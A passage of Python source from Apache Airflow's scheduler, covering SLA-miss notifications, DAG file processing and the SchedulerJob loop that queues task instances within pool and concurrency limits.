session.query(SlaMiss)
.filter(SlaMiss.notification_sent == False, SlaMiss.dag_id == dag.dag_id) # noqa
.all()
)
# pylint: enable=singleton-comparison
if slas: # pylint: disable=too-many-nested-blocks
sla_dates: List[datetime.datetime] = [sla.execution_date for sla in slas]
fetched_tis: List[TI] = (
session.query(TI)
.filter(TI.state != State.SUCCESS, TI.execution_date.in_(sla_dates), TI.dag_id == dag.dag_id)
.all()
)
blocking_tis: List[TI] = []
for ti in fetched_tis:
if ti.task_id in dag.task_ids:
ti.task = dag.get_task(ti.task_id)
blocking_tis.append(ti)
else:
session.delete(ti)
session.commit()
task_list = "\n".join([sla.task_id + ' on ' + sla.execution_date.isoformat() for sla in slas])
blocking_task_list = "\n".join(
[ti.task_id + ' on ' + ti.execution_date.isoformat() for ti in blocking_tis]
)
# Track whether email or any alert notification sent
# We consider email or the alert callback as notifications
email_sent = False
notification_sent = False
if dag.sla_miss_callback:
# Execute the alert callback
self.log.info('Calling SLA miss callback')
try:
dag.sla_miss_callback(dag, task_list, blocking_task_list, slas, blocking_tis)
notification_sent = True
except Exception: # pylint: disable=broad-except
self.log.exception("Could not call sla_miss_callback for DAG %s", dag.dag_id)
email_content = f"""\
Here's a list of tasks that missed their SLAs:
<pre><code>{task_list}\n</code></pre>
Blocking tasks:
<pre><code>{blocking_task_list}</code></pre>
Airflow Webserver URL: {conf.get(section='webserver', key='base_url')}
"""
tasks_missed_sla = []
for sla in slas:
try:
task = dag.get_task(sla.task_id)
except TaskNotFound:
# task already deleted from DAG, skip it
self.log.warning(
"Task %s doesn't exist in DAG anymore, skipping SLA miss notification.", sla.task_id
)
continue
tasks_missed_sla.append(task)
emails: Set[str] = set()
for task in tasks_missed_sla:
if task.email:
if isinstance(task.email, str):
emails |= set(get_email_address_list(task.email))
elif isinstance(task.email, (list, tuple)):
emails |= set(task.email)
if emails:
try:
send_email(emails, f"[airflow] SLA miss on DAG={dag.dag_id}", email_content)
email_sent = True
notification_sent = True
except Exception: # pylint: disable=broad-except
Stats.incr('sla_email_notification_failure')
self.log.exception("Could not send SLA Miss email notification for DAG %s", dag.dag_id)
# If we sent any notification, update the sla_miss table
if notification_sent:
for sla in slas:
sla.email_sent = email_sent
sla.notification_sent = True
session.merge(sla)
session.commit()
@staticmethod
def update_import_errors(session: Session, dagbag: DagBag) -> None:
"""
For the DAGs in the given DagBag, record any associated import errors and clear
errors for files that no longer have them. These are usually displayed through the
Airflow UI so that users know that there are issues parsing DAGs.
:param session: session for ORM operations
:type session: sqlalchemy.orm.session.Session
:param dagbag: DagBag containing DAGs with import errors
:type dagbag: airflow.DagBag
"""
# Clear the errors of the processed files
for dagbag_file in dagbag.file_last_changed:
session.query(errors.ImportError).filter(errors.ImportError.filename == dagbag_file).delete()
# Add the errors of the processed files
for filename, stacktrace in dagbag.import_errors.items():
session.add(
errors.ImportError(filename=filename, timestamp=timezone.utcnow(), stacktrace=stacktrace)
)
session.commit()
@provide_session
def execute_callbacks(
self, dagbag: DagBag, callback_requests: List[CallbackRequest], session: Session = None
) -> None:
"""
Execute callback requests (task failure, SLA, and DAG callbacks). These can come from SchedulerJob or from
DagFileProcessorManager.
:param dagbag: Dag Bag of dags
:param callback_requests: failure callbacks to execute
:type callback_requests: List[airflow.utils.callback_requests.CallbackRequest]
:param session: DB session.
"""
for request in callback_requests:
try:
if isinstance(request, TaskCallbackRequest):
self._execute_task_callbacks(dagbag, request)
elif isinstance(request, SlaCallbackRequest):
self.manage_slas(dagbag.dags.get(request.dag_id))
elif isinstance(request, DagCallbackRequest):
self._execute_dag_callbacks(dagbag, request, session)
except Exception: # pylint: disable=broad-except
self.log.exception(
"Error executing %s callback for file: %s",
request.__class__.__name__,
request.full_filepath,
)
session.commit()
@provide_session
def _execute_dag_callbacks(self, dagbag: DagBag, request: DagCallbackRequest, session: Session):
dag = dagbag.dags[request.dag_id]
dag_run = dag.get_dagrun(execution_date=request.execution_date, session=session)
dag.handle_callback(
dagrun=dag_run, success=not request.is_failure_callback, reason=request.msg, session=session
)
def _execute_task_callbacks(self, dagbag: DagBag, request: TaskCallbackRequest):
simple_ti = request.simple_task_instance
if simple_ti.dag_id in dagbag.dags:
dag = dagbag.dags[simple_ti.dag_id]
if simple_ti.task_id in dag.task_ids:
task = dag.get_task(simple_ti.task_id)
ti = TI(task, simple_ti.execution_date)
# Get properties needed for failure handling from SimpleTaskInstance.
ti.start_date = simple_ti.start_date
ti.end_date = simple_ti.end_date
ti.try_number = simple_ti.try_number
ti.state = simple_ti.state
ti.test_mode = self.UNIT_TEST_MODE
if request.is_failure_callback:
ti.handle_failure(request.msg, ti.test_mode, ti.get_template_context())
self.log.info('Executed failure callback for %s in state %s', ti, ti.state)
@provide_session
def process_file(
self,
file_path: str,
callback_requests: List[CallbackRequest],
pickle_dags: bool = False,
session: Session = None,
) -> Tuple[int, int]:
"""
Process a Python file containing Airflow DAGs.
This includes:
1. Execute the file and look for DAG objects in the namespace.
2. Pickle the DAG and save it to the DB (if necessary).
3. For each DAG, see what tasks should run and create appropriate task
instances in the DB.
4. Record any errors importing the file into ORM
:param file_path: the path to the Python file that should be executed
:type file_path: str
:param callback_requests: callback requests to execute for this file
:type callback_requests: List[airflow.utils.dag_processing.CallbackRequest]
:param pickle_dags: whether to serialize the DAGs found in the file and
save them to the db
:type pickle_dags: bool
:param session: Sqlalchemy ORM Session
:type session: Session
:return: number of dags found, count of import errors
:rtype: Tuple[int, int]
"""
self.log.info("Processing file %s for tasks to queue", file_path)
try:
dagbag = DagBag(file_path, include_examples=False, include_smart_sensor=False)
except Exception: # pylint: disable=broad-except
self.log.exception("Failed at reloading the DAG file %s", file_path)
Stats.incr('dag_file_refresh_error', 1, 1)
return 0, 0
if len(dagbag.dags) > 0:
self.log.info("DAG(s) %s retrieved from %s", dagbag.dags.keys(), file_path)
else:
self.log.warning("No viable dags retrieved from %s", file_path)
self.update_import_errors(session, dagbag)
return 0, len(dagbag.import_errors)
self.execute_callbacks(dagbag, callback_requests)
# Save individual DAGs in the ORM
dagbag.sync_to_db()
if pickle_dags:
paused_dag_ids = DagModel.get_paused_dag_ids(dag_ids=dagbag.dag_ids)
unpaused_dags: List[DAG] = [
dag for dag_id, dag in dagbag.dags.items() if dag_id not in paused_dag_ids
]
for dag in unpaused_dags:
dag.pickle(session)
# Record import errors into the ORM
try:
self.update_import_errors(session, dagbag)
except Exception: # pylint: disable=broad-except
self.log.exception("Error logging import errors!")
return len(dagbag.dags), len(dagbag.import_errors)
class SchedulerJob(BaseJob): # pylint: disable=too-many-instance-attributes
"""
This SchedulerJob runs for a specific time interval and schedules the jobs
that are ready to run. It figures out the latest runs for each
task and sees if the dependencies for the next schedules are met.
If so, it creates appropriate TaskInstances and sends run commands to the
executor. It does this for each task in each DAG and repeats.
:param dag_id: if specified, only schedule tasks with this DAG ID
:type dag_id: str
:param dag_ids: if specified, only schedule tasks with these DAG IDs
:type dag_ids: list[str]
:param subdir: directory containing Python files with Airflow DAG
definitions, or a specific path to a file
:type subdir: str
:param num_runs: The number of times to run the scheduling loop. If you
have a large number of DAG files this could complete before each file
has been parsed. -1 for unlimited times.
:type num_runs: int
:param num_times_parse_dags: The number of times to try to parse each DAG file.
-1 for unlimited times.
:type num_times_parse_dags: int
:param processor_poll_interval: The number of seconds to wait between
polls of running processors
:type processor_poll_interval: int
:param do_pickle: once a DAG object is obtained by executing the Python
file, whether to serialize the DAG object to the DB
:type do_pickle: bool
"""
__mapper_args__ = {'polymorphic_identity': 'SchedulerJob'}
heartrate: int = conf.getint('scheduler', 'SCHEDULER_HEARTBEAT_SEC')
def __init__(
self,
subdir: str = settings.DAGS_FOLDER,
num_runs: int = conf.getint('scheduler', 'num_runs'),
num_times_parse_dags: int = -1,
processor_poll_interval: float = conf.getfloat('scheduler', 'processor_poll_interval'),
do_pickle: bool = False,
log: Any = None,
*args,
**kwargs,
):
self.subdir = subdir
self.num_runs = num_runs
# In specific tests, we want to stop the parse loop after the _files_ have been parsed a certain
# number of times. This is only to support testing, and isn't something a user is likely to want to
# configure -- they'll want num_runs
self.num_times_parse_dags = num_times_parse_dags
self._processor_poll_interval = processor_poll_interval
self.do_pickle = do_pickle
super().__init__(*args, **kwargs)
if log:
self._log = log
# Check what SQL backend we use
sql_conn: str = conf.get('core', 'sql_alchemy_conn').lower()
self.using_sqlite = sql_conn.startswith('sqlite')
self.using_mysql = sql_conn.startswith('mysql')
self.max_tis_per_query: int = conf.getint('scheduler', 'max_tis_per_query')
self.processor_agent: Optional[DagFileProcessorAgent] = None
self.dagbag = DagBag(dag_folder=self.subdir, read_dags_from_db=True)
def register_signals(self) -> None:
"""Register signals that stop child processes"""
signal.signal(signal.SIGINT, self._exit_gracefully)
signal.signal(signal.SIGTERM, self._exit_gracefully)
signal.signal(signal.SIGUSR2, self._debug_dump)
def _exit_gracefully(self, signum, frame) -> None: # pylint: disable=unused-argument
"""Helper method to clean up processor_agent to avoid leaving orphan processes."""
self.log.info("Exiting gracefully upon receiving signal %s", signum)
if self.processor_agent:
self.processor_agent.end()
sys.exit(os.EX_OK)
def _debug_dump(self, signum, frame): # pylint: disable=unused-argument
try:
sig_name = signal.Signals(signum).name # pylint: disable=no-member
except Exception: # pylint: disable=broad-except
sig_name = str(signum)
self.log.info("%s\n%s received, printing debug\n%s", "-" * 80, sig_name, "-" * 80)
self.executor.debug_dump()
self.log.info("-" * 80)
def is_alive(self, grace_multiplier: Optional[float] = None) -> bool:
"""
Is this SchedulerJob alive?
We define alive as in a state of running and a heartbeat within the
threshold defined in the ``scheduler_health_check_threshold`` config
setting.
``grace_multiplier`` is accepted for compatibility with the parent class.
:rtype: boolean
"""
if grace_multiplier is not None:
# Accept the same behaviour as superclass
return super().is_alive(grace_multiplier=grace_multiplier)
scheduler_health_check_threshold: int = conf.getint('scheduler', 'scheduler_health_check_threshold')
return (
self.state == State.RUNNING
and (timezone.utcnow() - self.latest_heartbeat).total_seconds() < scheduler_health_check_threshold
)
@provide_session
def _change_state_for_tis_without_dagrun(
self, old_states: List[str], new_state: str, session: Session = None
) -> None:
"""
For all DAG IDs in the DagBag, look for task instances in the
old_states and set them to new_state if the corresponding DagRun
does not exist or exists but is not in the running state. This
normally should not happen, but it can if the state of DagRuns is
changed manually.
:param old_states: examine TaskInstances in this state
:type old_states: list[airflow.utils.state.State]
:param new_state: set TaskInstances to this state
:type new_state: airflow.utils.state.State
"""
tis_changed = 0
query = (
session.query(models.TaskInstance)
.outerjoin(models.TaskInstance.dag_run)
.filter(models.TaskInstance.dag_id.in_(list(self.dagbag.dag_ids)))
.filter(models.TaskInstance.state.in_(old_states))
.filter(
or_(
# pylint: disable=comparison-with-callable
models.DagRun.state != State.RUNNING,
# pylint: disable=no-member
models.DagRun.state.is_(None),
)
)
)
# We need to do this for mysql as well because it can cause deadlocks
# as discussed in https://issues.apache.org/jira/browse/AIRFLOW-2516
if self.using_sqlite or self.using_mysql:
tis_to_change: List[TI] = with_row_locks(query, of=TI, **skip_locked(session=session)).all()
for ti in tis_to_change:
ti.set_state(new_state, session=session)
tis_changed += 1
else:
subq = query.subquery()
current_time = timezone.utcnow()
ti_prop_update = {
models.TaskInstance.state: new_state,
models.TaskInstance.start_date: current_time,
}
# Only add end_date and duration if the new_state is 'success', 'failed' or 'skipped'
if new_state in State.finished:
ti_prop_update.update(
{
models.TaskInstance.end_date: current_time,
models.TaskInstance.duration: 0,
}
)
tis_changed = (
session.query(models.TaskInstance)
.filter(
models.TaskInstance.dag_id == subq.c.dag_id,
models.TaskInstance.task_id == subq.c.task_id,
models.TaskInstance.execution_date == subq.c.execution_date,
)
.update(ti_prop_update, synchronize_session=False)
)
if tis_changed > 0:
session.flush()
self.log.warning(
"Set %s task instances to state=%s as their associated DagRun was not in RUNNING state",
tis_changed,
new_state,
)
Stats.gauge('scheduler.tasks.without_dagrun', tis_changed)
@provide_session
def __get_concurrency_maps(
self, states: List[str], session: Session = None
) -> Tuple[DefaultDict[str, int], DefaultDict[Tuple[str, str], int]]:
"""
Get the concurrency maps.
:param states: List of states to query for
:type states: list[airflow.utils.state.State]
:return: A map from dag_id to # of task instances and
a map from (dag_id, task_id) to # of task instances in the given state list
:rtype: tuple[dict[str, int], dict[tuple[str, str], int]]
"""
ti_concurrency_query: List[Tuple[str, str, int]] = (
session.query(TI.task_id, TI.dag_id, func.count('*'))
.filter(TI.state.in_(states))
.group_by(TI.task_id, TI.dag_id)
).all()
dag_map: DefaultDict[str, int] = defaultdict(int)
task_map: DefaultDict[Tuple[str, str], int] = defaultdict(int)
for result in ti_concurrency_query:
task_id, dag_id, count = result
dag_map[dag_id] += count
task_map[(dag_id, task_id)] = count
return dag_map, task_map
# pylint: disable=too-many-locals,too-many-statements
@provide_session
def _executable_task_instances_to_queued(self, max_tis: int, session: Session = None) -> List[TI]:
"""
Finds TIs that are ready for execution with respect to pool limits,
dag concurrency, executor state, and priority.
:param max_tis: Maximum number of TIs to queue in this loop.
:type max_tis: int
:return: list[airflow.models.TaskInstance]
"""
executable_tis: List[TI] = []
# Get the pool settings. We get a lock on the pool rows, treating this as a "critical section"
# Throws an exception if lock cannot be obtained, rather than blocking
pools = models.Pool.slots_stats(lock_rows=True, session=session)
# If the pools are full, there is no point doing anything!
# If _somehow_ the pool is overfull, don't let the limit go negative - it breaks SQL
pool_slots_free = max(0, sum(pool['open'] for pool in pools.values()))
if pool_slots_free == 0:
self.log.debug("All pools are full!")
return executable_tis
max_tis = min(max_tis, pool_slots_free)
# Get all task instances associated with scheduled
# DagRuns which are not backfilled, in the given states,
# and the dag is not paused
query = (
session.query(TI)
.outerjoin(TI.dag_run)
.filter(or_(DR.run_id.is_(None), DR.run_type != DagRunType.BACKFILL_JOB))
.join(TI.dag_model)
.filter(not_(DM.is_paused))
.filter(TI.state == State.SCHEDULED)
.options(selectinload('dag_model'))
.limit(max_tis)
)
task_instances_to_examine: List[TI] = with_row_locks(
query,
of=TI,
**skip_locked(session=session),
).all()
# TODO[HA]: This was wrong before anyway, as it only looked at a sub-set of dags, not everything.
# Stats.gauge('scheduler.tasks.pending', len(task_instances_to_examine))
if len(task_instances_to_examine) == 0:
self.log.debug("No tasks to consider for execution.")
return executable_tis
# Put one task instance on each line
task_instance_str = "\n\t".join([repr(x) for x in task_instances_to_examine])
self.log.info("%s tasks up for execution:\n\t%s", len(task_instances_to_examine), task_instance_str)
pool_to_task_instances: DefaultDict[str, List[models.Pool]] = defaultdict(list)
for task_instance in task_instances_to_examine:
pool_to_task_instances[task_instance.pool].append(task_instance)
# dag_id to # of running tasks and (dag_id, task_id) to # of running tasks.
dag_concurrency_map: DefaultDict[str, int]
task_concurrency_map: DefaultDict[Tuple[str, str], int]
dag_concurrency_map, task_concurrency_map = self.__get_concurrency_maps(
states=list(EXECUTION_STATES), session=session
)
num_tasks_in_executor = 0
# Number of tasks that cannot be scheduled because of no open slot in pool
num_starving_tasks_total = 0
# Go through each pool, and queue up a task for execution if there are
# any open slots in the pool.
# pylint: disable=too-many-nested-blocks
for pool, task_instances in pool_to_task_instances.items():
pool_name = pool
if pool not in pools:
self.log.warning("Tasks using non-existent pool '%s' will not be scheduled", pool)
continue
open_slots = pools[pool]["open"]
num_ready = len(task_instances)
self.log.info(
"Figuring out tasks to run in Pool(name=%s) with %s open slots "
"and %s task instances ready to be queued",
pool,
open_slots,
num_ready,
)
priority_sorted_task_instances = sorted(
task_instances, key=lambda ti: (-ti.priority_weight, ti.execution_date)
)
num_starving_tasks = 0
for current_index, task_instance in enumerate(priority_sorted_task_instances):
if open_slots <= 0:
self.log.info("Not scheduling since there are %s open slots in pool %s", open_slots, pool)
# Can't schedule any more since there are no more open slots.
num_unhandled = len(priority_sorted_task_instances) - current_index
num_starving_tasks += num_unhandled
num_starving_tasks_total += num_unhandled
break
# Check to make sure that the task concurrency of the DAG hasn't been
# reached.
dag_id = task_instance.dag_id
current_dag_concurrency = dag_concurrency_map[dag_id]
dag_concurrency_limit = task_instance.dag_model.concurrency
self.log.info(
"DAG %s has %s/%s running and queued tasks",
dag_id,
current_dag_concurrency,
dag_concurrency_limit,
)
if current_dag_concurrency >= dag_concurrency_limit:
self.log.info(
"Not executing %s since the number of tasks running or queued "
"from DAG %s is >= to the DAG's task concurrency limit of %s",
task_instance,
dag_id,
dag_concurrency_limit,
)
continue
task_concurrency_limit: Optional[int] = None
if task_instance.dag_model.has_task_concurrency_limits:
# Many dags don't have a task_concurrency, so it's better to avoid loading the
# full serialized DAG where we can.
serialized_dag = self.dagbag.get_dag(dag_id, session=session)
if serialized_dag.has_task(task_instance.task_id):
task_concurrency_limit = serialized_dag.get_task(
task_instance.task_id
).task_concurrency
if task_concurrency_limit is not None:
current_task_concurrency = task_concurrency_map[
(task_instance.dag_id, task_instance.task_id)
]
if current_task_concurrency >= task_concurrency_limit:
self.log.info(
"Not executing %s since the task concurrency for"
" this task has been reached.",
task_instance,
)
continue
if task_instance.pool_slots > open_slots:
self.log.info(
"Not executing %s since it requires %s slots "
"but there are %s open slots in the pool %s.",
task_instance,
task_instance.pool_slots,
open_slots,
pool,
)
num_starving_tasks += 1
num_starving_tasks_total += 1
# Though we can execute tasks with lower priority if there's enough room
continue
executable_tis.append(task_instance)
open_slots -= task_instance.pool_slots
dag_concurrency_map[dag_id] += 1
task_concurrency_map[(task_instance.dag_id, task_instance.task_id)] += 1
Stats.gauge(f'pool.starving_tasks.{pool_name}', num_starving_tasks)
Stats.gauge('scheduler.tasks.starving', num_starving_tasks_total)
Stats.gauge('scheduler.tasks.running', num_tasks_in_executor)
Stats.gauge('scheduler.tasks.executable', len(executable_tis))
task_instance_str = "\n\t".join([repr(x) for x in executable_tis])
self.log.info("Setting the following tasks to queued state:\n\t%s", task_instance_str)
# set TIs to queued state
filter_for_tis = TI.filter_for_tis(executable_tis)
session.query(TI).filter(filter_for_tis).update(
# TODO[ha]: should we use func.now()? How does that work with DB timezone on mysql when it's not
# UTC?
{TI.state: State.QUEUED, TI.queued_dttm: timezone.utcnow(), TI.queued_by_job_id: self.id},
synchronize_session=False,
)
for ti in executable_tis:
make_transient(ti)
return executable_tis
def _enqueue_task_instances_with_queued_state(self, task_instances: List[TI]) -> None:
"""
Takes task_instances, which should have been set to queued, and enqueues them
with the executor.
:param task_instances: TaskInstances to enqueue
:type task_instances: list[TaskInstance]
"""
# actually enqueue them
for ti in task_instances:
command = TI.generate_command(
ti.dag_id,
ti.task_id,
ti.execution_date,
local=True,
mark_success=False,
ignore_all_deps=False,
ignore_depends_on_past=False,
ignore_task_deps=False,
ignore_ti_state=False,
pool=ti.pool,
file_path=ti.dag_model.fileloc,
pickle_id=ti.dag_model.pickle_id,
)
priority = ti.priority_weight
queue = ti.queue
self.log.info("Sending %s to executor with priority %s and queue %s", ti.key, priority, queue)
self.executor.queue_command(
ti,
command,
priority=priority,
queue=queue,
)
def _critical_section_execute_task_instances(self, session: Session) -> int:
"""
Attempts to execute TaskInstances that should be executed by the scheduler.
There are three steps:
1. Pick TIs by priority with the constraint that they are in the expected states
and that we do not exceed max_active_runs or pool limits.
2. Change the state for the TIs above atomically.
3. Enqueue the TIs in the executor.
HA note: This function is a "critical section" meaning that only a single executor process can execute
this function at the same time. This is achieved by doing ``SELECT ... from pool FOR UPDATE``. For DBs
that support NOWAIT, a "blocked" scheduler will skip this and continue on with other tasks (creating
new DAG runs, progressing TIs from None to SCHEDULED etc.); for DBs that don't support this (such as
MariaDB or MySQL 5.x), the other schedulers will wait for the lock before continuing.
:param session:
:type session: sqlalchemy.orm.Session
:return: Number of task instance with state changed.
"""
max_tis = min(self.max_tis_per_query, self.executor.slots_available)
queued_tis = self._executable_task_instances_to_queued(max_tis, session=session)
self._enqueue_task_instances_with_queued_state(queued_tis)
return len(queued_tis)
@provide_session
def _change_state_for_tasks_failed_to_execute(self, session: Session = None):
"""
If there are tasks left over in the executor,
we set them back to SCHEDULED to avoid creating hanging tasks.
:param session: session for ORM operations
"""
if not self.executor.queued_tasks:
return
filter_for_ti_state_change = [
and_(
TI.dag_id == dag_id,
TI.task_id == task_id,
TI.execution_date == execution_date,
# TI.try_number returns the raw try_number + 1 when the ti is not running,
# so we subtract 1 here to match the DB record.
TI._try_number == try_number - 1, # pylint: disable=protected-access
TI.state == State.QUEUED,
)
for dag_id, task_id, execution_date, try_number in self.executor.queued_tasks.keys()
]
ti_query = session.query(TI).filter(or_(*filter_for_ti_state_change))
tis_to_set_to_scheduled: List[TI] = with_row_locks(ti_query).all()
if not tis_to_set_to_scheduled:
return
# set TIs back to scheduled state
filter_for_tis = TI.filter_for_tis(tis_to_set_to_scheduled)
session.query(TI).filter(filter_for_tis).update(
{TI.state: State.SCHEDULED, TI.queued_dttm: None}, synchronize_session=False
)
for task_instance in tis_to_set_to_scheduled:
self.executor.queued_tasks.pop(task_instance.key)
task_instance_str = "\n\t".join(repr(x) for x in tis_to_set_to_scheduled)
self.log.info("Set the following tasks to scheduled state:\n\t%s", task_instance_str)
@provide_session
def _process_executor_events(self, session: Session = None) -> int:
"""Respond to executor events."""
if not self.processor_agent:
raise ValueError("Processor agent is not started.")
ti_primary_key_to_try_number_map: Dict[Tuple[str, str, datetime.datetime], int] = {}
event_buffer = self.executor.get_event_buffer()
tis_with_right_state: List[TaskInstanceKey] = []
# Report execution
for ti_key, value in event_buffer.items():
state: str
state, _ = value
# We create map (dag_id, task_id, execution_date) -> in-memory try_number
ti_primary_key_to_try_number_map[ti_key.primary] = ti_key.try_number
self.log.info(
"Executor reports execution of %s.%s execution_date=%s "
"exited with status %s for try_number %s",
ti_key.dag_id,
ti_key.task_id,
ti_key.execution_date,
state,
ti_key.try_number,
)
if state in (State.FAILED, State.SUCCESS, State.QUEUED):
tis_with_right_state.append(ti_key)
# Return if no finished tasks
if not tis_with_right_state:
return len(event_buffer)
# Check state of finished tasks
filter_for_tis = TI.filter_for_tis(tis_with_right_state)
tis: List[TI] = session.query(TI).filter(filter_for_tis).options(selectinload('dag_model')).all()
for ti in tis:
try_number = ti_primary_key_to_try_number_map[ti.key.primary]
buffer_key = ti.key.with_try_number(try_number)
state, info = event_buffer.pop(buffer_key)
# TODO: should we fail RUNNING as well, as we do in Backfills?
if state == State.QUEUED:
ti.external_executor_id = info
self.log.info("Setting external_id for %s to %s", ti, info)
continue
if ti.try_number == buffer_key.try_number and ti.state == State.QUEUED:
Stats.incr('scheduler.tasks.killed_externally')
msg = (
"Executor reports task instance %s finished (%s) although the "
"task says its %s. (Info: %s) Was the task killed externally?"
)
self.log.error(msg, ti, state, ti.state, info)
request = TaskCallbackRequest(
full_filepath=ti.dag_model.fileloc,
simple_task_instance=SimpleTaskInstance(ti),
msg=msg % (ti, state, ti.state, info),
)
self.processor_agent.send_callback_to_execute(request)
return len(event_buffer)
def _execute(self) -> None:
self.log.info("Starting the scheduler")
# DAGs can be pickled for easier remote execution by some executors
pickle_dags = self.do_pickle and self.executor_class not in UNPICKLEABLE_EXECUTORS
self.log.info("Processing each file at most %s times", self.num_times_parse_dags)
# When using sqlite, we do not use async_mode
# so the scheduler job and DAG parser don't access the DB at the same time.
async_mode = not self.using_sqlite
processor_timeout_seconds: int = conf.getint('core', 'dag_file_processor_timeout')
processor_timeout = timedelta(seconds=processor_timeout_seconds)
self.processor_agent = DagFileProcessorAgent(
dag_directory=self.subdir,
max_runs=self.num_times_parse_dags,
processor_factory=type(self)._create_dag_file_processor,
processor_timeout=processor_timeout,
dag_ids=[],
pickle_dags=pickle_dags,
async_mode=async_mode,
)
try:
self.executor.job_id = self.id
self.executor.start()
self.register_signals()
# Start after resetting orphaned tasks to avoid stressing out DB.
self.processor_agent.start()
execute_start_time = timezone.utcnow()
self._run_scheduler_loop()
# Stop any processors
self.processor_agent.terminate()
# Verify that all files were processed, and if so, deactivate DAGs that
# haven't been touched by the scheduler as they likely have been
# deleted.
if self.processor_agent.all_files_processed:
self.log.info(
"Deactivating DAGs that haven't been touched since %s", execute_start_time.isoformat()
)
models.DAG.deactivate_stale_dags(execute_start_time)
self.executor.end()
settings.Session.remove() # type: ignore
except Exception: # pylint: disable=broad-except
self.log.exception("Exception when executing SchedulerJob._run_scheduler_loop")
finally:
self.processor_agent.end()
self.log.info("Exited execute loop")
@staticmethod
def _create_dag_file_processor(
file_path: str,
callback_requests: List[CallbackRequest],
dag_ids: Optional[List[str]],
pickle_dags: bool,
) -> DagFileProcessorProcess:
"""Creates DagFileProcessorProcess instance."""
return DagFileProcessorProcess(
file_path=file_path, pickle_dags=pickle_dags, dag_ids=dag_ids, callback_requests=callback_requests
)
def _run_scheduler_loop(self) -> None:
"""
The actual scheduler loop. The main steps in the loop are:
#. Harvest DAG parsing results through DagFileProcessorAgent
#. Find and queue executable tasks
#. Change task instance state in DB
#. Queue tasks in executor
#. Heartbeat executor
#. Execute queued tasks in executor asynchronously
#. Sync on the states of running tasks
Following is a graphic representation of these steps.
.. image:: ../docs/apache-airflow/img/scheduler_loop.jpg
:rtype: None
"""
if not self.processor_agent:
raise ValueError("Processor agent is not started.")
is_unit_test: bool = conf.getboolean('core', 'unit_test_mode')
timers = sched.scheduler()
def call_regular_interval(
delay: float,
action: Callable,
arguments=(),
kwargs={},
): # pylint: disable=dangerous-default-value
def repeat(*args, **kwargs):
action(*args, **kwargs)
# This is not perfect. If we want a timer every 60s, but action
# takes 10s to run, this will run it every 70s.
# Good enough for now
timers.enter(delay, 1, repeat, args, kwargs)
timers.enter(delay, 1, repeat, arguments, kwargs)
# Check on start up, then every configured interval
self.adopt_or_reset_orphaned_tasks()
call_regular_interval(
conf.getfloat('scheduler', 'orphaned_tasks_check_interval', fallback=300.0),
self.adopt_or_reset_orphaned_tasks,
)
call_regular_interval(
conf.getfloat('scheduler', 'pool_metrics_interval', fallback=5.0),
self._emit_pool_metrics,
)
call_regular_interval(
conf.getfloat('scheduler', 'clean_tis_without_dagrun_interval', fallback=15.0),
self._clean_tis_without_dagrun,
)
for loop_count in itertools.count(start=1):
with Stats.timer() as timer:
if self.using_sqlite:
self.processor_agent.run_single_parsing_loop()
# For the sqlite case w/ 1 thread, wait until the processor
# is finished to avoid concurrent access to the DB.
self.log.debug("Waiting for processors to finish since we're using sqlite")
self.processor_agent.wait_until_finished()
with create_session() as session:
num_queued_tis = self._do_scheduling(session)
self.executor.heartbeat()
session.expunge_all()
num_finished_events = self._process_executor_events(session=session)
self.processor_agent.heartbeat()
# Heartbeat the scheduler periodically
self.heartbeat(only_if_necessary=True)
# Run any pending timed events
next_event = timers.run(blocking=False)
self.log.debug("Next timed event is in %f", next_event)
self.log.debug("Ran scheduling loop in %.2f seconds", timer.duration)
if not is_unit_test and not num_queued_tis and not num_finished_events:
# If the scheduler is doing things, don't sleep. This means when there is work to do, the
# scheduler will run "as quick as possible", but when it's stopped, it can sleep, dropping CPU
# usage when "idle"
time.sleep(min(self._processor_poll_interval, next_event))
if loop_count >= self.num_runs > 0:
self.log.info(
"Exiting scheduler loop as requested number of runs (%d - got to %d) has been reached",
self.num_runs,
loop_count,
)
break
if self.processor_agent.done:
self.log.info(
"Exiting scheduler loop as requested DAG parse count (%d) has been reached after %d"
" scheduler loops",
self.num_times_parse_dags,
loop_count,
)
break
@provide_session
def _clean_tis_without_dagrun(self, session):
with prohibit_commit(session) as guard:
try:
self._change_state_for_tis_without_dagrun(
old_states=[State.UP_FOR_RETRY], new_state=State.FAILED, session=session
)
self._change_state_for_tis_without_dagrun(
old_states=[State.QUEUED, State.SCHEDULED, State.UP_FOR_RESCHEDULE, State.SENSING],
new_state=State.NONE,
session=session,
)
guard.commit()
except OperationalError as e:
if is_lock_not_available_error(error=e):
self.log.debug("Lock held by another Scheduler")
session.rollback()
else:
raise
guard.commit()
def _do_scheduling(self, session) -> int:
"""
This function is where the main scheduling decisions take place. It:
- Creates any necessary DAG runs by examining the next_dagrun_create_after column of DagModel
Since creating Dag Runs is a relatively time consuming process, we select only 10 dags by default
(configurable via ``scheduler.max_dagruns_to_create_per_loop`` setting) - putting this higher will
mean one scheduler could spend a chunk of time creating dag runs, and not ever get around to
scheduling tasks.
- Finds the "next n oldest" running DAG Runs to examine for scheduling (n=20 by default, configurable
via ``scheduler.max_dagruns_per_loop_to_schedule`` config setting) and tries to progress state (TIs
to SCHEDULED, or DagRuns to SUCCESS/FAILURE etc)
By "next oldest", we mean hasn't been examined/scheduled in the most time.
The reason we don't select all dagruns at once because the rows are selected with row locks, meaning
that only one scheduler can "process them", even it it is waiting behind other dags. Increasing this
limit will allow more throughput for smaller DAGs but will likely slow down throughput for larger
(>500 tasks.) DAGs
- Then, via a Critical Section (locking the rows of the Pool model) we queue tasks, and then send them
to the executor.
See docs of _critical_section_execute_task_instances for more.
:return: Number of TIs enqueued in this iteration
:rtype: int
"""
# Put a check in place to make sure we don't commit unexpectedly
with prohibit_commit(session) as guard:
if settings.USE_JOB_SCHEDULE:
query = DagModel.dags_needing_dagruns(session)
self._create_dag_runs(query.all(), session)
# commit the session - Release the write lock on DagModel table.
guard.commit()
# END: create dagruns
dag_runs = DagRun.next_dagruns_to_examine(session)
# Bulk fetch the currently active dag runs for the dags we are
# examining, rather than making one query per DagRun
# TODO: This query is probably horribly inefficient (though there is an
# index on (dag_id,state)). It is to deal with the case when a user
# clears more than max_active_runs older tasks -- we don't want the
# scheduler to suddenly go and start running tasks from all of the
# runs. (AIRFLOW-137/GH #1442)
#
# The longer term fix would be to have `clear` do this, and put DagRuns
# in to the queued state, then take DRs out of queued before creating
# any new ones
# Build up a set of execution_dates that are "active" for a given
# dag_id -- only tasks from those runs will be scheduled.
active_runs_by_dag_id = defaultdict(set)
query = (
session.query(
TI.dag_id,
TI.execution_date,
)
.filter(
TI.dag_id.in_(list({dag_run.dag_id for dag_run in dag_runs})),
